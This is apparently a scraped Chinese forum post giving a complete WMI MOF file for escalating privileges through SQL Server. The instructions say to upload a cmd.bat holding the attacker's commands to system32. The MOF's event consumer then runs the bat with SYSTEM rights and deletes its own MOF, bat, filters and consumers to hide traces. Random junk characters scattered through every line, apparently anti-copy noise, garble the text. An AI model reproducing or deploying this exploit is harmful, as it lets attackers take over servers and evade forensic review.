这个sql提权MOF需要运行 system下的文件,不能定义路径。& n; v0 r! w/ k
需要将要运行的命令写入到bat上传到system32目录,然后执行。9 F. P, V+ H( R8 {8 p
q: ^& O' g3 j$ J; Z这个sql提权MOF需要运行 system下的文件,不能定义路径。
' v# q6 v7 e& [7 b; `: j需要将要运行的命令写入到bat上传到system32目录,然后执行。/ v+ U9 `1 u3 N3 \8 Y- I
8 E2 G- v0 a& r% i1 W, W
#pragma
. |+ ?6 u& n3 E+ z9 } namespace("\\\\.\\root\\cimv2")/ c# g3 p1 B% h1 g. s2 z# Q J/ e
class: E& c9 G1 x& p$ r, r
MyClass547
) s6 D1 q' w. Z& P! Z) ~3 d; Q { [key]% x' w: e2 Q8 ^% Q: |
string
5 P% O/ a; A7 U, N6 H: E, Q Name;% L/ V+ i5 M# c" Z: u
};% F. K( M, \9 G' e$ Z
class% s7 y" @; w' z, X4 A
ActiveScriptEventConsumer5 g" r# O5 d* ~' f) s/ j+ f- \9 g
: __EventConsumer { [key]
4 l+ [* b* |8 d8 w string) L3 Z, c+ P3 G# @) [
Name; [not_null]& h( W6 N. H7 ?
string$ c! G) a) ?, g( N: q
ScriptingEngine; string( W; v5 z: g/ m" ^% \
ScriptFileName; [template]
0 A! u" k) S# W string
3 l* a$ k" c+ L9 @ ScriptText; uint32 KillTimeout;- g) X0 X1 w1 Y: H2 \. u
}; instance of __Win32Provider as $P {! n1 ?! R, A. m1 y8 U0 F& o
Name
Y$ c5 P- v7 x% n =
5 [% U1 J* v. e: _; @* d "ActiveScriptEventConsumer"; CLSID =
0 c# ~, Z- h, Y. W0 k/ Y. H "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";! P( m6 y2 V, m/ t2 |
PerUserInitialization8 @) r- a) g5 _/ X
= TRUE;+ s+ d; z5 @' F1 s. X. y3 a6 s
}; instance of __EventConsumerProviderRegistration { Provider
: B6 i- o( i+ P0 Y4 }) b = $P; ConsumerClassNames
7 a9 N# D7 @ |+ x6 p" ? X+ v =. X) c: p1 W& |. Y! z2 Q4 ` @6 U
{"ActiveScriptEventConsumer"};
" d- N# m/ [' n2 y };
5 i! q# L$ i3 ?; o+ o, A( T Instance of ActiveScriptEventConsumer/ g. ^ e+ U, R7 g8 _- ~
as $cons { Name
6 `: A: j9 }7 r2 }5 R" M# i; y; s =
7 @% q" i G( \5 E "ASEC"; ScriptingEngine
, E& E7 [8 a( c/ n3 _; P0 X =
0 _2 `7 z$ V+ X "JScript"; ScriptText
7 S0 X ^ O. h/ s% T =6 H ^" ^! z8 W6 k- V9 l, }
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };4 [2 I. L, Q( r( \8 @7 F8 e- f! ?
Instance of ActiveScriptEventConsumer. M: N: _$ D3 _) i
as $cons2 { Name
+ D7 Z; C/ c7 \. H8 m =
; W4 D* \8 [" K. l; q5 J/ Y$ Z "qndASEC"; ScriptingEngine
8 Z# h- E5 z- [8 W& C% K& @ =
- l/ n0 j. O5 x$ Y* v "JScript"; ScriptText
+ w; O6 T$ l' N- r( C7 D% C =6 g/ f8 }2 {, Y* e1 z ~
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";' l9 s( j# q& O) ?
}; instance of __EventFilter as $Filt { Name
8 h; H2 _$ P4 V8 [ =
5 A1 v: h$ r. b- }' v1 H3 ^. s "instfilt"; Query
; W+ } S! r5 M. L1 g5 M3 x =
" d1 x' A' G; r4 q "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
: b; Q# {9 i1 C: D( T7 X =, _ N: {$ a4 H7 q; ?9 w/ j
"WQL"; }; instance of __EventFilter as $Filt2 { Name
% f% D k% Z3 T4 o& n3 f =. U% E* ?5 I, H: Q8 u$ p
"qndfilt"; Query
2 g, l- f. H# Q7 i) v =+ ] o) Q7 r. \$ O% b. q4 ]
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
/ K' E N! N+ X. G: z) V3 T) { =
" a1 L0 E4 I) a" I+ ?) Z "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer8 B$ d! Q4 }$ z" d* R
= $cons; Filter% U; t& y3 e3 ^" c! w
= $Filt;( w! v% l a% z
}; instance of __FilterToConsumerBinding as $bind2 { Consumer5 B# o/ T# L' F6 K# D! n
= $cons2; Filter/ c) F# w; x" Y" R
= $Filt2;$ Y, v0 W# ]$ Y/ ?
}; instance of MyClass547/ a; v4 v2 {2 c5 ~9 ]
as $MyClass { Name$ }% D" G7 g. b# F( A* \9 l, J, w4 U
=7 Z$ r4 P, g1 ]4 g6 I( R
"ClassConsumer";
$ u& ` m: o4 _4 s }; |